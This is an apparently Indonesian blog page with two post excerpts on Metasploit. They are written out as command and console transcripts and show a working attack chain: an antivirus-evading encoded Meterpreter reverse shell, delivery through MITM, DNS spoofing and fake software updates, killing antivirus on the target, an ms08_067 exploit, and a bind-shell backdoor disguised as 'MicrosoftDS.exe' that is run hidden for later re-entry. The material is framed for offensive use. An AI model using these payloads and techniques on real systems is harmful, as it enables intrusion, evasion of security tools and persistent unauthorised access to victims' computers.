.fun and profit with meterpreter.

.so lets make ur choice kiddo,dengan mengacu sebelumnya pada artikel. .meterpreter non encode. [email protected]:/pentest/exploits/framework3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.12 LPORT=455 X > meterpreter_1.exe Created by msfpayload (http://www.metasploit.com). Payload: windows/meterpreter/reverse_tcp Length: 278 Options: LHOST=192.168.0.12,LPORT=455 http://www.virustotal.com/analisis/4b0a655b264b23b2f4dab74688c8890e Result: 1/39 .meterpreter with encode XOR. [email protected]:/pentest/exploits/framework3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.12 LPORT=455 R | ./msfencode -e x86/shikata_ga_nai -b '' -t exe -o meterpreter_2.exe [*] x86/shikata_ga_nai succeeded, final size 306 http://www.virustotal.com/analisis/cbb1cf1a7ce9943c5d8d15f210da8361 Result: 0/39 (0%) msf > use exploit/multi/handler msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(handler) > set LHOST 192.168.0.12 LHOST => 192.168.0.12 msf exploit(handler) > set LPORT 455 LPORT => 455 msf exploit(handler) > exploit [*] Handler binding to LHOST 0.0.0.0 [*] Started reverse handler [*] Starting the payload handler... .next move is critical,well sekarang attacker membuat target agar mengeksekusi meterpreter_2.exe sebeneranya ini tergantung imajinasi anda sendiri. .penulis sendiri memilih ettercap sebagai jembatan menggunakan metode MITM. bisa dengan ettercap filter yang akan membuat popup setiap target melakukan browsing. .ataupun dengan kombinasi evilgrade( www.infobyte.com.ar )+ettercap dengan DNS spoofing secara tidak langsung akan mengelabui target untuk melakukan fake patch untuk beberapa program yang ada di evilgrade exam: winamp,winzip,notepad++ bisa juga menambahkan modul tersendiri di evilgrade; firefox ataupun thunderbird (-.-)”. .setelah target mengeksekusi meterperter_2.exe. [*] Transmitting intermediate stager for over-sized stage...(191 bytes) [*] Sending stage (2650 bytes) [*] Sleeping before handling stage... [*] Uploading DLL (75787 bytes)... [*] Upload completed. [*] Meterpreter session 1 opened (192.168.0.12:455 -> 192.168.0.5:1037) meterpreter > sysinfo Computer: PENTEST3 OS : Windows XP (Build 2600, Service Pack 3). .with remote desktop. .there is for Virtual Network Computing look, im prefer CLI than GUI (^^)V. meterpreter > run getgui -----------------passing------------------------ .kill AV. meterpreter > run killav [*] Killing Antivirus services on the target... .ok bisa juga dengan mengedit killav.rb untuk menambahkan beberapa list AV tersendiri. [email protected]:~# vi /pentest/exploits/framework3/scripts/meterpreter/killav.rb # # Meterpreter script that kills all Antivirus processes # Provided by: Jerome Athias # print_status("Killing Antivirus...
Read More of .fun and profit with meterpreter.

Metasploit: Backdooring

Mungkin sebagian sudah ada yang tahu bahwa metasploit dapat digunakan untuk membuat backdoor, pernah juga disinggung pada toket edisi new year 2009. Penggunaan backdoor ini sangat berguna terutama sebagai post-exploitation method. Pada contoh kali ini kita akan memanfaatkan 2 metode dasar mendapatkan shell dari target, yaitu bind_tcp dan reverse_tcp. Untuk bind_tcp, backdoor akan dijalankan pada terget dimana target akan membuka port pada sistemnya sendiri. Sehingga setelah proses exploitasi selesai, kita dapat masuk kapan saja ke target dengan memanfaatkan port yang telah dibuka oleh backdoor tersebut. $ ./msfpayload windows/meterpreter/bind_tcp LPORT=4321 RHOST=10.10.96.143 EXITFUNC=thread X > MicrosoftDS.exe Created by msfpayload (http://www.metasploit.com). Payload: windows/meterpreter/bind_tcp Length: 307 Options: LPORT=4321,RHOST=10.10.96.143,EXITFUNC=thread Backdoor tersebut akan membuka port 4321 pada target 10.10.96.143. Bagaimana proses menjalankan backdoor tersebut terserah kita, bisa jadi backdoor ditanam dan dijalankan setelah proses exploitasi selesai terhadap target seperti berikut: msf exploit(ms08_067_netapi) > exploit [*] Handler binding to LHOST 0.0.0.0 [*] Started reverse handler [*] Automatically detecting the target... [*] Fingerprint: Windows XP Service Pack 0 / 1 - lang:English [*] Selected Target: Windows XP SP0/SP1 Universal [*] Triggering the vulnerability... [*] Transmitting intermediate stager for over-sized stage...(191 bytes) [*] Sending stage (2650 bytes) [*] Sleeping before handling stage... [*] Uploading DLL (75787 bytes)... [*] Upload completed. [*] Meterpreter session 3 opened (10.10.97.14:31338 -> 10.10.96.143:4780) meterpreter > cd meterpreter > pwd C: meterpreter > upload MicrosoftDS.exe [*] uploading : MicrosoftDS.exe -> MicrosoftDS.exe [*] uploaded : MicrosoftDS.exe -> MicrosoftDS.exe meterpreter > execute -f MicrosoftDS.exe -H Process 2348 created. Pada saat berikutnya, kita dapat masuk ke mesin target tanpa melakukan exploitasi ulang, cukup dengan membuka koneksi pada port yang telah didefinisikan berikutnya. msf > use exploit/multi/handler msf exploit(handler) > set PAYLOAD windows/meterpreter/bind_tcp PAYLOAD => windows/meterpreter/bind_tcp msf exploit(handler) > set LPORT 4321 LPORT => 4321 msf exploit(handler) > set RHOST 10.10.96.143 RHOST => 10.10.96.143 msf exploit(handler) > exploit [*] Starting the payload handler... [*] Started bind handler [*]...
Read More of Metasploit: Backdooring